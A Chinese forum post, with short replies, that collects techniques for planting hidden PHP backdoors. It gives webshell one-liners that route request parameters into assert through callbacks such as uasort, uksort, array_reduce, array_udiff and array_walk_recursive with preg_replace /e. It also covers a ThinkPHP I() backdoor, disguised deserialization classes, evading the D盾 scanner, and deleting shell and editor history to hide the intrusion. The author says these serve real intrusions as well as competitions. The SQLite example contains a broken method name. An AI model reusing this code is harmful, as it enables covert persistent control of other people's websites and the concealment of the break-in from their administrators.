奇淫异巧之PHP后门

奇淫异巧之PHP后门

前言

早上看了一位小伙伴在公众号发的文章“PHP后门隐藏技巧”,写的挺好,其中有一些姿势是我之前没见到过了,学到很很多。同时,这篇文章也引发了自己的一点点思考:“PHP后门的关键点在哪里?”,也欢迎上篇文章的作者、其它小伙伴一起来讨论。
上篇文章中的很多姿势很巧妙,尤其在比赛的时候,可以重点关注一下。但部分姿势,类似不死马这种东西,是否是留后门的正确选择呢?
个人认为,后门的关键,在于“隐蔽”。而不死马这类后门的特点,其实是“顽固”。然而在系统最高权限的运维手里……顽固貌似没有太大用处,只要发现了,总有办法给你干掉。
而对于隐蔽来说,有以下几点要素:

  1. 熟悉环境,模拟环境,适应环境,像一只变色龙一样隐藏
  2. 清除痕迹,避免运维发现
  3. 避免后门特征值被D盾等工具检测到

就以上几点点,放出一些我收藏的技巧~其思路来源于各位师傅,尤其是P神的博客。

姿势

一般过狗思路

最一般的绕狗、后门思路就是

call_user_func('assert', $_REQUEST['pass']);

直接参数回调,将$_REQUEST['pass']传入的数据,传递给assert函数去执行。

双参数回调后门

在PHP5.4.8+版本中,assert有一个新的可选参数descrition。所以较于之前的PHP版本,我们可以使用一些新的方式去进行调用,这些新的方式也暂时还没有添加到D盾的特征匹配中。

Talk is cheap show me the code~

<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));

$_REQUEST['e']的话,传递GET或者POST参数都可以。

uasort函数在手册里这样定义:

image
如果我们传入的比较函数是assert的话,就会产生代码执行。

先将参数保存为一个数组,传入'assert'的base64编码,使用uasort函数调用即可。

由此方法引申出的姿势有:

一. 换为uksort函数:

<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);

二. 面向对象的方法:

<?php
// way 0
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');

// way 1
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');

三. array_reduce

<?php
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);

四. array_udiff

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);

三参数回调后门

上面的函数都是两个参数,然后回调指定函数的,下面还有3个参数的:

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');

这段代码的最终效果是回调名字为$e的函数,$arr数组中的$_POST[pass](键)作为回调函数的第一个参数,'|.*|e'作为第二个参数。''作为第三个参数。

有哪些函数是可以三个参数并且代码执行or命令执行的呢?
最最常见的:preg_replace函数在e修饰符条件下可以进行命令执行,原理可以看这个文章

最后的效果为:

preg_replace('|.*|e', '你的命令', '');

但preg_replace并不能直接用,因为D盾会将它作为特征值去检测,我们可以换一些其它效果类似的函数:

mb_ereg_replace
preg_filter

sqlite回调后门

如果可以使用PDO的话,可以用sqlite的PDO来执行代码

<?php
$db = new PDO('sqlite::memory:');
$st = $db->query("SELECT 'phpinfo()'");
$re = $st->frtch
?>

隐蔽性满满的~

反序列化后门

之前说了要适应环境,增强隐蔽性,所以可以根据目标代码,去添加一些恶意类,然后用反序列化漏洞来传递命令,并且可以通过捏造可信度比较高的的类名,在index.php中就直接引用,更不容易被发现。
传输过程中,还可以进行一些加密、混淆操作,来绕过waf端检测。
思路可参照,前一阵子typecho爆出的反序列化漏洞

thinkphp特征后门

thinkphp的自带方法中,存在可以作为后门的I函数
具体代码逻辑比较复杂,有兴趣的同学可以移步P神的文章
只要在可访问的地方,加上一行代码:

I('post.ph0rse','',I('get.i'));

就可以传递GET参数:i=assert, POST参数ph0rse=你的命令
并且可以远连菜刀~

同样,通过审计,在其它开源框架中其实也可以发现类似的留后门技巧。直接调用源类库里的方法,再稍微加一点混淆和加密,就很难被发现了。

后话

真正的后门,要靠系统层

对于PHP后门来说,如果能做到隐蔽性,不会被D盾等工具自动检测出来。人工查看时,一时半会儿也看不出有问题,其实就够了。

受限于运维的日志审查,通过PHP去进行后渗透不太现实,PHP后门最大的意义在于,留有一个通道。等其它通道关闭或者网站迁移(总要移代码吧)时,能够维持对目标站的控制。

而真正的后渗透操作,还是要考系统层的其它技巧,比如shift后门,ssh后门,注册表木马等等~这些都是后话了~

擦除痕迹

想要让后面隐蔽,除了以上几点,还要清理好文件操作的痕迹。在Linux下就是删除.bash_history和.viminfo的记录,这些记录显示了你前段时间执行了哪些命令,修改了哪些文本。


image
image
image

而在windows下,就是在注册表中做一些操作~

上一篇文章突然激起了写作欲,但受限于时间,没能去一步一步截图。当然,这篇文章主要是想阐述思路,比如回调函数的妙用,PHP后门应该是什么样~

文中介绍的姿势是我自己实战或者打比赛常用的,搜集而成,并非原创。但可以保证,这些姿势我都试过,复现起来是完全OK的~

跳出PHP,讨论后面的话,就比较复杂了,从悄咪咪留后门,到秘密管理后门、窃听数据,再到清理痕迹~各种姿势,千方百怪,前几天还学到了利用微信客户端来留后门远控的~
那就是很长的一篇故事了

有机会再和大家分享吧~也希望能抛砖引玉,大家一起来聊一聊你所知道的,新奇的后门技巧

1 个赞

不明觉厉,只能慢慢学习了。

图片挂了,需要重新上传

https://www.freebuf.com/articles/web/194243.html

已重传